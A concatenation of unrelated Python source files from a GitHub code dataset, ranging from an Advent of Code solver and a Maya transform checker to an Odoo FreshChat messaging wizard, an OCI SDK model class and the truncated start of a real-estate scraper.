pass\n","repo_name":"HaoguangYang/ReFRESH_ros-old","sub_path":"scripts/refresh_ros/ReFRESH_ros_utils.py","file_name":"ReFRESH_ros_utils.py","file_ext":"py","file_size_in_byte":18757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"30409372508","text":"from image_utils import *\nif __name__ == \"__main__\":\n file = input(\"image file> \")\n image = read_ppm(file)\n\n # Test writing it unmodified\n save_ppm(\"unmodified.ppm\", image)\n\n # rotate the colors, it's a simple manipulation, but it's always a fun one.\n width, height = get_width_height(image)\n for x in range(width):\n for y in range(height):\n r, g, b = image[x][y]\n image[x][y] = (g, b, r)\n save_ppm(\"modified.ppm\", image)\n","repo_name":"jakelang01/k_means","sub_path":"image_utils_test.py","file_name":"image_utils_test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8646514014","text":"# import sys\n\n# print(sys.getrefcount('mea'))\n# vtuber = ['mea', 'aqua', 'alice']\n# print(sys.getrefcount('mea'))\n\n# mea, aqua, alice = 'mea', 'aqua', 'alice'\n# print(sys.getrefcount('mea'))\n# vup = [mea, aqua, alice]\n# print(sys.getrefcount('mea'))\n\n# print(list(map(lambda x, y: x is y, vtuber, vup)))\n\n# d0 = 3.14\n# d1 = 3.14\n# print(d0 is d1)\n\n# s0 = \"a@be#ee\"\n# s1 = \"a@be#ee\"\n# print(s0 is s1)\n\n# r0, r1 = range(5), range(5)\n# # 二者指向了不同的对象\n# print(r0 is r1) # False\n\n# r2 = r0\n# # 二者是相同对象的引用\n# print(r0 is r2) # True\n\n# from matplotlib import pyplot as plt\n# import sys\n\n# sizes = []\n# for i in range(2**5):\n# sizes.append(sys.getsizeof(sizes))\n\n# print(sizes)\n# plt.plot(sizes)\n# plt.show()\n\n'''\nres = [[]]\n\nfor num in range(3):\n res += [r + [num] for r in res]\n\nprint(res)\n'''\n\n# nums = range(3)\n\n# print(\n# [(x, y, z)\n# for x in nums\n# for y in nums\n# for z in nums\n# if x != y != z]\n# )\n\n# vtubers = ['miko', 'watame', 'fubuki', 'pekora']\n# print([name for name in vtubers if len(name) > 5])\n\n# def fib(n):\n# a, b = 0, 1\n# for _ in range(n):\n# a, b = b, a + b\n# return a\n\n# print(fib(0))\n\n# def func(name, comp='hololive', *args, **kwargs):\n# return comp, name, kwargs\n\n# print(func('aqua', age=5))\n# print(func('alice', comp='2434', age=16))\n\n# def wrap(*args, **kwargs):\n# print(args)\n# print(kwargs)\n\n# wrap('mea', 18, types='debu')\n\n# def func(var1, *args, **kwargs):\n# return var1, args, kwargs\n\n# print(func(*range(5), poi='poi'))\n# print(func(1, poi='poi'))\n\n# print(func(1, 2, default=-1, poi='poi'))\n\n# def recv(maxsize, tag='socket', *, block):\n# return maxsize, tag, block\n\n# print(recv(1024, block=True))\n# print(recv(4096, 'files', block=True))\n\n# from collections import namedtuple\n\n# Vtuber = namedtuple('Vtuber', ['name', 'age', 'company'])\n\n# mea = Vtuber('mea', 18, None)\n\n# print(mea[0] is mea.name)\n# print(mea)\n\n# a = Vtuber()\n# print(a.name)\n\n# t = (1, 2, [30, 40])\n\n# try:\n# t[2] += [50, 60]\n# except TypeError as e:\n# print(e)\n\n# print(t)\nclass MySeq:\n def __getitem__(self, index):\n if isinstance(index, slice):\n print(f\"slice: {index}\")\n elif isinstance(index, int):\n print(f\"index: {index}\")\n else:\n msg = f\"{type(self)} indices must be integers\"\n raise TypeError(msg)\n\ns = MySeq()\n\ns[9]\ns[::-1]\ns[\"key\"]","repo_name":"LiHao217/l919898756.github.io","sub_path":"code/simple_list.py","file_name":"simple_list.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35894519234","text":"import json\nimport os\nimport re\n\npath = \"book_MONEY_id_1881.json\"\nf = open(path, \"r\")\nstring = f.read()\nf.close()\nregext = \"{YI, October 4, 1900 par. 2}\"\npattern = \"\\{\\w+\\s*\\w*, \\w+ \\d+, \\d+ par. \\d+\\}\"\nparaList = re.split(pattern, string)\n\nreferences = re.findall(pattern, string )\n\ndel paraList[len(paraList)-1]\nprint(paraList[len(paraList)-1])\n\nprint(len(paraList))\nprint(len(references))\nindex = 3544\nlastFilename = \"\"\nfor x in range(0, len(paraList)):\n word = paraList[x].strip()\n if \"money\" in word.lower():\n reference = references[x]\n reference = re.sub(\"{\", \"\", reference)\n reference = re.sub(\"}\", \"\", reference) \n print(word)\n print(reference)\n\n\n bookCode = reference.split(\" \")[0].replace(\",\", \"\")\n print(\"bookCode: \" + bookCode)\n pattern = \"\\w+ \\d+, \\d+\"\n page = re.search(pattern, reference).group()\n print(page)\n pattern = \"par. \\d+\"\n par = re.search(pattern, reference).group().replace(\"par. \", \"\")\n print(par)\n\n index = index + 1\n print(\"index: \" + str(index))\n filenameBookCode = \"DEBT\"\n filename = \"book_\"+filenameBookCode+\"_id_\"+str(index)+\".json\"#book_DA_id_2122.json\n jsonObj = {\"word\": word, \"paragraph\": int(par), \"bookcode\": bookCode, \"page\": page}\n print(\"filename: \" + filename)\n print(jsonObj)\n #choice = input(\"continue: \")\n #confirm = input(\"continue\")\n with open(filename, \"w\") as outfile:\n json.dump(jsonObj, outfile, indent=4)\n lastFilename = filename \n\nprint(\"lastFilename: \" + lastFilename)\ntry:\n os.remove(path)\nexcept Exception as e:\n print(e)\n\ntry:\n os.rename(lastFilename, path)\nexcept Exception as e:\n print(e)\n \n","repo_name":"gesab001/assets","sub_path":"egw/fix.py","file_name":"fix.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8132199558","text":"from search_by_city import search_by_city\nfrom search_by_zip import search_by_zip\n\ndef search():\n while True:\n choice = input(\"Please choose to either 1) Search by City Name or 2) Search by Zip Code: \").strip()\n\n if choice == \"1\":\n print(\"Note: additional steps required if there are multiple cities with the same name\")\n city_name = input(\"Please input the city name: \").strip().title()\n state_code = input(\"Please input the 2 character state code: \").strip().upper()\n return search_by_city(city_name, state_code)\n elif choice == \"2\":\n zip_code = input(\"Please input the 5-digit US zip code: \").strip()\n return search_by_zip(int(zip_code))\n elif choice == \"x\":\n break\n else:\n print(\"That is not one of the options. Please input 1 to search by city name or 2 to search by zip code.\")\n print(\"If you would like to exit the search, input x.\")","repo_name":"acheng-osu/weather-app","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70914791524","text":"\"\"\"Day 7 Solution\"\"\"\nSIZE_LIMIT = 100000\nTOTAL_SPACE = 70000000\nSPACE_NEEDED = 30000000\n\n\nclass Directory:\n \"\"\"Directory Node\"\"\"\n\n def __init__(self, name, parent=None):\n self.name: str = name\n self.parent: Directory = parent\n self.children: dict[str, Directory] = dict()\n self.size: int = 0\n\n\ndef make_tree(file_name: str) -> Directory:\n \"\"\"Converts file input to a tree\"\"\"\n root = Directory(\"/\")\n curr = root\n for line in open(file_name, \"r\").readlines()[1:]:\n if line.startswith(\"$ cd\"):\n name = line[5:-1]\n if name == \"..\":\n curr = curr.parent\n else:\n if name not in curr.children:\n curr.children[name] = Directory(name, curr)\n curr = curr.children[name]\n elif not line.startswith((\"$\", \"dir\")):\n value = int(line[: line.index(\" \")])\n curr.size += value\n parent = curr.parent\n while parent:\n parent.size += value\n parent = parent.parent\n return root\n\n\ndef solve(file_name: str):\n \"\"\"Solves based on input\"\"\"\n root = make_tree(file_name)\n\n total_under_limit = 0\n need_to_free = SPACE_NEEDED - (TOTAL_SPACE - root.size)\n\n amount_freed = float(\"inf\")\n stack = [root]\n while stack:\n directory = stack.pop()\n if directory.size <= SIZE_LIMIT:\n total_under_limit += directory.size\n if directory.size >= need_to_free and directory.size < amount_freed:\n amount_freed = directory.size\n for child in directory.children.values():\n stack.append(child)\n\n return total_under_limit, amount_freed\n\n\nif __name__ == \"__main__\":\n answer1, answer2 = solve(\"input.txt\")\n print(f\"The answer for part one is {answer1}\")\n print(f\"The answer for part two is {answer2}\")\n","repo_name":"Dhirajk1/AdventOfCode2022","sub_path":"Day07/solution_day7.py","file_name":"solution_day7.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19668764896","text":"from odoo import models, api, fields\nimport ast\nimport json\nimport logging\nfrom datetime import datetime\nfrom requests import request\nfrom odoo.exceptions import Warning\n\n_logger = logging.getLogger(\"==== FreshChat Post SMS ====\")\n\n\nclass PostSmsWizard(models.TransientModel):\n _inherit = \"post.sms.wizard\"\n\n @api.model\n def default_get(self, fields_list):\n res = super(PostSmsWizard, self).default_get(fields_list)\n order_id = self.env[\"sale.order\"].browse(self._context.get(\"active_id\"))\n if order_id:\n if \"number\" in fields_list:\n number = order_id.partner_id.phone or order_id.partner_id.mobile\n if not number and order_id.partner_invoice_id:\n number = order_id.partner_invoice_id.phone or order_id.partner_invoice_id.mobile\n if not number and order_id.partner_shipping_id:\n number = order_id.partner_shipping_id.phone or order_id.partner_shipping_id.mobile\n if not number:\n res['number'] = number\n return res\n\n template_id = fields.Many2one(comodel_name=\"freshchat.template\", string=\"Template\")\n\n @api.multi\n def post_sms(self):\n current_datetime = datetime.now()\n if not self._context.get(\"provider\") == \"freshchat_sms\":\n return super(PostSmsWizard, self).post_sms()\n if self.send_msg_to == \"group\":\n raise Warning(\"Group is not allowed\")\n sms_instance_id = self.env[\"sms.instance\"].search([(\"provider\", \"=\", \"freshchat_sms\")])\n if not sms_instance_id:\n error_message = \"Please First Create SMS Instance\"\n self.env[\"msg.error.log\"].create({\"sms_instance_id\": sms_instance_id.id or None,\n \"datetime\": current_datetime,\n \"error_message\": error_message,\n \"process\": \"Send SMS\"})\n _logger.info(error_message)\n return\n if not self.message or not self.template_id or not self.number:\n raise Warning(\"Please fill the all field\")\n\n body = self.message.split(\",\")\n template_data = []\n for msg in body:\n template_data.append({\"data\": msg})\n\n to_number = self.number\n if self.calling_code_id.prefix_number == \"+91\":\n to_number = \"+91{}\".format(to_number)\n else:\n to_number = to_number.lstrip(\"0\")\n to_number = to_number.lstrip(\"+\")\n if not to_number.startswith(\"966\"):\n to_number = \"+966{}\".format(to_number)\n from_number = sms_instance_id.fc_number\n from_number = from_number.lstrip(\"0\")\n from_number = from_number.lstrip(\"+\")\n if not from_number.startswith(\"966\"):\n from_number = \"+966{}\".format(from_number)\n\n url = \"{}/whatsapp\".format(sms_instance_id.fc_url)\n token = \"Bearer {}\".format(sms_instance_id.fc_token)\n template = self.template_id.name\n data = {\"from\": {\"phone_number\": from_number}, \"to\": [{\"phone_number\": to_number}], \"data\": {\n \"message_template\": {\n \"storage\": \"none\",\n \"namespace\": sms_instance_id.fc_namespace,\n \"template_name\": template,\n \"language\": {\"policy\": \"fallback\",\n \"code\": \"en\"},\n \"template_data\": template_data}}}\n headers = {\"Authorization\": token,\n 'Content-Type': 'application/json'}\n status = None\n try:\n response = request(\"POST\", url=url, headers=headers, data=json.dumps(data))\n except Exception as e:\n self.env[\"msg.error.log\"].create({\"sms_instance_id\": sms_instance_id.id,\n \"datetime\": current_datetime,\n \"error_message\": str(e),\n \"process\": \"Send SMS\"})\n status = \"Error\"\n response = False\n request_id = None\n if response:\n if response.status_code == 202:\n response = json.loads(response.text)\n request_id = response.get(\"request_id\")\n status_url = \"{}?request_id={}\".format(sms_instance_id.fc_url, request_id)\n try:\n status_response = request(\"GET\", url=status_url, headers=headers)\n except Exception as e:\n self.env[\"msg.error.log\"].create({\"sms_instance_id\": sms_instance_id.id,\n \"datetime\": current_datetime,\n \"error_message\": str(e),\n \"process\": \"Get Status\"})\n status = \"Error\"\n status_response = False\n if status_response:\n if status_response.status_code == 200:\n status_response = json.loads(status_response.text)\n outbound_messages = status_response.get(\"outbound_messages\")[0]\n status = outbound_messages.get(\"status\")\n if status == \"IN_PROGRESS\":\n status = \"IN PROGRESS\"\n status_id = self.env[\"msg.status\"].search(\n [(\"name\", \"=\", status), (\"sms_instance_id.provider\", \"=\", sms_instance_id.provider)])\n\n if not status_id:\n status_id = self.env[\"msg.status\"].create({\"name\": status, \"sms_instance_id\": sms_instance_id.id})\n order_id = self.env[\"sale.order\"].browse(self._context.get(\"active_id\"))\n report_values = {\"from_number\": from_number,\n \"to_number\": to_number,\n \"body\": body,\n \"msg_status_id\": status_id.id,\n \"message_datetime\": current_datetime,\n \"sms_instance_id\": sms_instance_id.id,\n \"sid\": request_id,\n \"order_id\": order_id.id or None}\n self.env[\"msg.delivery.report\"].create(report_values)\n\n @api.onchange(\"template_id\")\n def onchange_on_template_id(self):\n template_id = self.template_id\n if template_id:\n order_id = self.env[\"sale.order\"].browse(self._context.get(\"active_id\"))\n if template_id.name == \"welcome_message\":\n self.message = order_id.partner_id.name\n elif template_id.name == \"visa_payment\":\n self.message = \"{},{}\".format(order_id.partner_id.name, order_id.name)\n elif template_id.name == \"bank_payment\":\n self.message = \"{},{}\".format(order_id.partner_id.name, order_id.name)\n else:\n self.message = \"\"\n","repo_name":"mouafiq/baytonia","sub_path":"eg_freshchat_msg/wizards/post_sms_wizard.py","file_name":"post_sms_wizard.py","file_ext":"py","file_size_in_byte":6868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15147289072","text":"# Grindstone gs_FrozenTransforms_class.py\r\n# Authors: Sam Carnes and Sean Adams\r\n\r\n# This file defines a script that checks for any unfrozen transforms\r\n\r\n\r\nimport maya.cmds as cmds\r\n\r\nclass FrozenTransforms:\r\n \r\n #********** INIT **********#\r\n \r\n def __init__(self):\r\n \r\n # identify whether or not the script has an auto-fix function\r\n self.hasFix = True\r\n\r\n # identify what this check is called\r\n self.scriptName = \"Frozen transforms\"\r\n \r\n # provides a label for the button that executes the auto-fix\r\n # NO MORE THAN 20 CHARACTERS\r\n self.fixLabel = \"Freeze transforms\"\r\n \r\n \r\n # class data\r\n self.transformList = []\r\n self.cameraList = []\r\n self.objectsWithUnfrozenTransforms = []\r\n \r\n \r\n \r\n \r\n #********** DO CHECK **********#\r\n \r\n def doCheck(self):\r\n \r\n # get the transform nodes and cameras\r\n self.transformList = cmds.ls(type = 'transform')\r\n self.cameraList = cmds.listCameras()\r\n self.objectsWithUnfrozenTransforms = []\r\n\r\n # for all transform nodes\r\n for item in self.transformList:\r\n \r\n # if the node does not apply to a camera\r\n if item not in self.cameraList:\r\n \r\n # check the translation, rotation, and scale values for the node \r\n # and if they are not frozen, add it to the unfrozen list\r\n \r\n if cmds.xform(item, query=True, translation=True) != [0, 0, 0]:\r\n self.objectsWithUnfrozenTransforms.append(item)\r\n \r\n elif cmds.xform(item, query=True, rotation=True) != [0, 0, 0]:\r\n self.objectsWithUnfrozenTransforms.append(item)\r\n \r\n elif cmds.xform(item, query=True, relative=True, scale=True) != [1, 1, 1]:\r\n self.objectsWithUnfrozenTransforms.append(item)\r\n \r\n \r\n #print self.objectsWithUnfrozenTransforms\r\n \r\n if len(self.objectsWithUnfrozenTransforms) > 0:\r\n if len(self.objectsWithUnfrozenTransforms) > 1:\r\n singularOrPlural = \"objects\"\r\n \r\n else:\r\n singularOrPlural = \"object\"\r\n \r\n returnString = str(len(self.objectsWithUnfrozenTransforms)) + \" \" + singularOrPlural + \" with unfrozen transforms detected.\"\r\n return returnString\r\n \r\n else:\r\n return ''\r\n \r\n \r\n \r\n \r\n #********** RUN FIX **********#\r\n \r\n # freezes transforms\r\n def runFix(self):\r\n \r\n # try the fix\r\n try:\r\n \r\n # freeze the transforms on the unfrozen nodes\r\n cmds.makeIdentity(self.objectsWithUnfrozenTransforms, apply=True, t=1, r=1, s=1, n=0, pn=1)\r\n \r\n \r\n # return the result\r\n return \"Transforms frozen.\"\r\n \r\n # if the fix doesn't work, return an error message\r\n except:\r\n \r\n return \"There was a problem freezing transforms.\"\r\n \r\n \r\n \r\n#********** RETURN INSTANCE OF SCRIPT CLASS **********#\r\n \r\ndef getObject():\r\n return FrozenTransforms()","repo_name":"sadams115/Grindstone","sub_path":"gs_decentralized/Specialized/Maya/gs_assets/gs_scripts/Modeling/gs_FrozenTransforms_class.py","file_name":"gs_FrozenTransforms_class.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40815863646","text":"from gpigapp import Model\nimport csv\n\n# Paths to our fictional DBs\nresourcesPath = \"data/mock_db/resources.csv\"\nbuildingsPath = \"data/mock_db/affectedBuildings.csv\"\nsafeHousesPath = \"data/mock_db/safeHouses.csv\"\npeoplePath = \"data/mock_db/people.csv\"\n\nclass additionalData():\n def __init__(self, buildings):\n self.buildings = buildings\n\n def getMoreData(self, samplePoints):\n\n if samplePoints == 0 or len(self.buildings) == 0:\n return None, None\n\n buildings = []\n for i in range(samplePoints):\n if len(self.buildings) > 0:\n buildings.append(self.buildings.pop())\n \n persons = getAffectedPersonsFromBuildings(buildings)\n\n return buildings, persons\n\ndef getResources():\n \"\"\"\n Returns a list of resources.\n \"\"\"\n resources = []\n \n with open(resourcesPath, 'r') as re:\n res = csv.reader(re, dialect='excel')\n \n # Skip header row\n next(res)\n \n for row in res:\n location = Model.Location(float(row[1]), float(row[2])) \n \n if row[3] == \"Boat\":\n resources.append( Model.Boat(location, int(row[4])) )\n continue\n if row[3] == \"Responder\":\n resources.append( Model.Responder(location) )\n continue\n if row[3] == \"Paramedic\":\n resources.append( Model.Paramedic(location) )\n\n return resources\n\ndef getSafeHouses():\n \"\"\"\n Returns a list of safe houses\n \"\"\"\n safeHouses = []\n with open(safeHousesPath, 'r') as sh:\n safe = csv.reader(sh, dialect='excel')\n \n # Skip header row\n next(safe)\n \n for row in safe:\n location = Model.Location(float(row[1]), float(row[2]))\n impacted = True\n if row[3] == '0':\n impacted = False\n if not impacted:\n capacity = int(row[5]) \n safeHouses.append( Model.Safehouse(location, impacted, capacity))\n\n return safeHouses\n\ndef getBuildings():\n \"\"\"\n Returns a list of possibly affected buildings\n \"\"\"\n affected = getAffectedPersons()\n buildings = []\n\n with open(buildingsPath, 'r') as ab:\n affectedBuildings = csv.reader(ab, dialect='excel')\n \n # Skip header row\n next(affectedBuildings)\n \n for row in affectedBuildings:\n\n location = Model.Location(float(row[1]), float(row[2]))\n impacted = True\n if row[3] == '0':\n impacted = False\n if impacted :\n estimatedOccupants = int(row[5]) \n occupants = row[7].split(',')\n\n if occupants[0] != '':\n affectedOccupants = [affected[x] for x in map(int, occupants)] \n else:\n affectedOccupants = []\n\n buildings.append( Model.AffectedBuilding(location, impacted, estimatedOccupants, affectedOccupants))\n\n return buildings\n\ndef getAffectedPersons():\n \"\"\"\n Returns a dict of affected people (a dict to be able to mathc them with buildings)\n \"\"\"\n affected = {}\n\n with open(peoplePath, 'r') as pep:\n people = csv.reader(pep, dialect='excel')\n next(people)\n\n for row in people:\n name = Model.Name(row[3], row[4])\n dob = row[5]\n priority = int(row[7])\n if row[6] == \"Affected\":\n affected[int(row[0])] = Model.AffectedPerson(name, dob, priority)\n continue\n if row[6] == \"Vulnerable\":\n affected[int(row[0])] = Model.VulnerablePerson(name, dob, priority)\n continue\n if row[6] == \"Injured\":\n affected[int(row[0])] = Model.InjuredPerson(name, dob, priority)\n continue\n\n return affected\n\ndef getAffectedPersonsFromBuildings(buildings):\n affected = []\n for building in buildings:\n if building.affectedOccupants != None:\n for person in building.affectedOccupants:\n affected.append(person)\n return affected\n\ndef getPopulatedModel():\n tasks = []\n resources = getResources()\n buildings = getBuildings()\n additional = additionalData(buildings)\n buildings = additional.getMoreData(10)[0] + getSafeHouses() \n affectedPersons = getAffectedPersonsFromBuildings(buildings)\n \n return Model.Model( tasks, resources, affectedPersons, buildings ), additional\n","repo_name":"Oliver-Binns/GPIG","sub_path":"gpigapp/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16394036735","text":"import pandas as pd\n\ndef getUnigram(words):\n\treturn words\n\ndef getBigram(words, join=\"_\"):\n\tl=len(words)\n\tresult=[]\n\tif(l<=1):\n\t\treturn words\n\tfor i in range(l-1):\n\t\tresult.append(words[i]+join+words[i+1])\n\n\treturn result\n\ndef getTrigram(words, join=\"_\"):\n\tl=len(words)\n\tresult=[]\n\tif(l<=2):\n\t\treturn words\n\tfor i in range(l-2):\n\t\tresult.append(words[i]+join+words[i+1]+join+words[i+2])\n\n\treturn result\n\n\n","repo_name":"mrugani/ProductSearchEval","sub_path":"Code/features/ngram.py","file_name":"ngram.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7015115009","text":"import numpy as np\nfrom PValCalculationModel import nbinom_logsf\nfrom FuncsDefiner import np_transformed_vis, np_cis_dist_func\n\n\nclass CisPValCalculator:\n\n def __init__(self, objs_holder):\n\n self.sess = objs_holder.sess\n\n # universally known variables\n self.vis = objs_holder.vis\n self.r = objs_holder.cis_r\n self.f_params = objs_holder.cis_f_params\n self.vis_transformer_params = objs_holder.cis_vis_transformer_params\n\n def run_model(self, interactions):\n\n r_val, f_params_val, vis_transformer_params_vals, vis_val = \\\n self.sess.run([self.r, self.f_params, self.vis_transformer_params, self.vis])\n\n vi_p = np_transformed_vis(vis_transformer_params_vals, vis_val[interactions[:, 0]])\n vj_p = np_transformed_vis(vis_transformer_params_vals, vis_val[interactions[:, 1]])\n\n # calculating expected value\n exp_interactions = vi_p * vj_p * np_cis_dist_func(f_params_val, np.abs(interactions[:, 0] - interactions[:, 1]))\n\n log_p_vals = nbinom_logsf(interactions[:, 2], exp_interactions, r_val)\n\n return log_p_vals\n","repo_name":"bcb-sut/MaxHiC","sub_path":"General/CisPValCalculationModel.py","file_name":"CisPValCalculationModel.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31578373879","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UpdateCertificateConfigDetails(object):\n \"\"\"\n The details of the contents of the certificate and certificate metadata.\n \"\"\"\n\n #: A constant which can be used with the config_type property of a UpdateCertificateConfigDetails.\n #: This constant has a value of \"ISSUED_BY_INTERNAL_CA\"\n CONFIG_TYPE_ISSUED_BY_INTERNAL_CA = \"ISSUED_BY_INTERNAL_CA\"\n\n #: A constant which can be used with the config_type property of a UpdateCertificateConfigDetails.\n #: This constant has a value of \"MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA\"\n CONFIG_TYPE_MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA = \"MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA\"\n\n #: A constant which can be used with the config_type property of a UpdateCertificateConfigDetails.\n #: This constant has a value of \"IMPORTED\"\n CONFIG_TYPE_IMPORTED = \"IMPORTED\"\n\n #: A constant which can be used with the stage property of a UpdateCertificateConfigDetails.\n #: This constant has a value of \"CURRENT\"\n STAGE_CURRENT = \"CURRENT\"\n\n #: A constant which can be used with the stage property of a UpdateCertificateConfigDetails.\n #: This constant has a value of \"PENDING\"\n STAGE_PENDING = \"PENDING\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UpdateCertificateConfigDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.certificates_management.models.UpdateCertificateByImportingConfigDetails`\n * :class:`~oci.certificates_management.models.UpdateCertificateIssuedByInternalCaConfigDetails`\n * :class:`~oci.certificates_management.models.UpdateCertificateManagedExternallyIssuedByInternalCaConfigDetails`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param config_type:\n The value to assign to the config_type property of this UpdateCertificateConfigDetails.\n Allowed values for this property are: \"ISSUED_BY_INTERNAL_CA\", \"MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA\", \"IMPORTED\"\n :type config_type: str\n\n :param version_name:\n The value to assign to the version_name property of this UpdateCertificateConfigDetails.\n :type version_name: str\n\n :param stage:\n The value to assign to the stage property of this UpdateCertificateConfigDetails.\n Allowed values for this property are: \"CURRENT\", \"PENDING\"\n :type stage: str\n\n \"\"\"\n self.swagger_types = {\n 'config_type': 'str',\n 'version_name': 'str',\n 'stage': 'str'\n }\n\n self.attribute_map = {\n 'config_type': 'configType',\n 'version_name': 'versionName',\n 'stage': 'stage'\n }\n\n self._config_type = None\n self._version_name = None\n self._stage = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['configType']\n\n if type == 'IMPORTED':\n return 'UpdateCertificateByImportingConfigDetails'\n\n if type == 'ISSUED_BY_INTERNAL_CA':\n return 'UpdateCertificateIssuedByInternalCaConfigDetails'\n\n if type == 'MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA':\n return 'UpdateCertificateManagedExternallyIssuedByInternalCaConfigDetails'\n else:\n return 'UpdateCertificateConfigDetails'\n\n @property\n def config_type(self):\n \"\"\"\n **[Required]** Gets the config_type of this UpdateCertificateConfigDetails.\n The origin of the certificate.\n\n Allowed values for this property are: \"ISSUED_BY_INTERNAL_CA\", \"MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA\", \"IMPORTED\"\n\n\n :return: The config_type of this UpdateCertificateConfigDetails.\n :rtype: str\n \"\"\"\n return self._config_type\n\n @config_type.setter\n def config_type(self, config_type):\n \"\"\"\n Sets the config_type of this UpdateCertificateConfigDetails.\n The origin of the certificate.\n\n\n :param config_type: The config_type of this UpdateCertificateConfigDetails.\n :type: str\n \"\"\"\n allowed_values = [\"ISSUED_BY_INTERNAL_CA\", \"MANAGED_EXTERNALLY_ISSUED_BY_INTERNAL_CA\", \"IMPORTED\"]\n if not value_allowed_none_or_none_sentinel(config_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `config_type`, must be None or one of {allowed_values}\"\n )\n self._config_type = config_type\n\n @property\n def version_name(self):\n \"\"\"\n Gets the version_name of this UpdateCertificateConfigDetails.\n A name for the certificate version. When the value is not null, a name is unique across versions of a given certificate.\n\n\n :return: The version_name of this UpdateCertificateConfigDetails.\n :rtype: str\n \"\"\"\n return self._version_name\n\n @version_name.setter\n def version_name(self, version_name):\n \"\"\"\n Sets the version_name of this UpdateCertificateConfigDetails.\n A name for the certificate version. When the value is not null, a name is unique across versions of a given certificate.\n\n\n :param version_name: The version_name of this UpdateCertificateConfigDetails.\n :type: str\n \"\"\"\n self._version_name = version_name\n\n @property\n def stage(self):\n \"\"\"\n Gets the stage of this UpdateCertificateConfigDetails.\n The rotation state of the certificate. The default is `CURRENT`, meaning that the certificate is currently in use. A certificate version\n that you mark as `PENDING` is staged and available for use, but you don't yet want to rotate it into current, active use. For example,\n you might update a certificate and mark its rotation state as `PENDING` if you haven't yet updated the certificate on the target system.\n\n Allowed values for this property are: \"CURRENT\", \"PENDING\"\n\n\n :return: The stage of this UpdateCertificateConfigDetails.\n :rtype: str\n \"\"\"\n return self._stage\n\n @stage.setter\n def stage(self, stage):\n \"\"\"\n Sets the stage of this UpdateCertificateConfigDetails.\n The rotation state of the certificate. The default is `CURRENT`, meaning that the certificate is currently in use. A certificate version\n that you mark as `PENDING` is staged and available for use, but you don't yet want to rotate it into current, active use. For example,\n you might update a certificate and mark its rotation state as `PENDING` if you haven't yet updated the certificate on the target system.\n\n\n :param stage: The stage of this UpdateCertificateConfigDetails.\n :type: str\n \"\"\"\n allowed_values = [\"CURRENT\", \"PENDING\"]\n if not value_allowed_none_or_none_sentinel(stage, allowed_values):\n raise ValueError(\n f\"Invalid value for `stage`, must be None or one of {allowed_values}\"\n )\n self._stage = stage\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/certificates_management/models/update_certificate_config_details.py","file_name":"update_certificate_config_details.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"70339528805","text":"import requests\nimport json\nimport os\nimport csv\nimport multiprocessing\nfrom time import sleep\nfrom random import randint\nfrom modules.Writer import Scrape\nfrom uszipcode import SearchEngine\n\n\nclass Scraper(Scrape):\n def __init__(self,\n region,\n county_info,\n redfin_cookies,\n redfin_headers,\n redfin_params,\n interest_rate,\n borrowing_pct,\n mortgage_term_years,\n insurance_cost\n ):\n Scrape.__init__(self)\n self.region = region\n self.insurance_cost = insurance_cost\n self.county_info = county_info\n self.interest_rate = interest_rate\n self.borrowing_pct = borrowing_pct\n self.redfin_headers = redfin_headers\n self.redfin_params = redfin_params\n self.redfin_cookies = redfin_cookies\n self.mortgage_term_years = mortgage_term_years\n self.housing_data = {}\n self.data = []\n self.exception_counties = {\n \"King County\": \"Kings County\",\n }\n self.search = SearchEngine(simple_zipcode=True)\n self.air_dna_headers = {\n 'Sec-Fetch-Mode': 'cors',\n 'Referer': 'https://www.airdna.co/vacation-rental-data/app/us/california/union-city/rentalizer',\n 'Origin': 'https://www.airdna.co',\n 'User-Agent': 